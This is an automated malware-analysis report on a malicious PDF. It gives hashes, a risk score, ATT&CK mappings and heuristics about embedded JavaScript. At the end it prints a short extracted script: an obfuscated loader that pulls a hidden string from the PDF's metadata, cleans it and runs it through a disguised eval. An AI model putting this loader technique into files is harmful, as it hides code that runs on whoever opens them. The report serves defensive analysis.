Malicious PDF — malware analysis report

Static analysis result for SHA-256 3f116507c279570d…

MALICIOUS

PDF

Size: 7.3 KB
First seen: 2013-04-22
MD5: 3953ba47a6b6a280257c63dea32b6de9
SHA-1: 606d2216b1ecea3b2baae151374922398beefb66
SHA-256: 3f116507c279570dd7a1b9c3c40c05b3717a5571b740c62ce039ce3349e79f8d
Risk Score: 66

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File

The ML classifier strongly indicates this PDF is malicious. Static analysis detected embedded JavaScript, which is often used to exploit PDF reader vulnerabilities or download further malicious content. The presence of a JavaScript stream suggests an attempt to execute arbitrary code upon opening the document.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (3)

  • Malformed active-content stream length (severity: medium) PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • JavaScript action (severity: low, 1 related finding) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0011_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 11 at offset 0x19FB
Size: 108 bytes
SHA-256: e3b8ed99dee109ed231cb155f11bd5b0c7b0d0de66095b5007a392b3f6a72126
Preview of the extracted script (first 1,000 lines):
m1=this.info.cduh;m2=m1.replace(/5qqq5/g,"");m9="val";m3=this.info.vfyg.concat(m9);        this[m3](m2);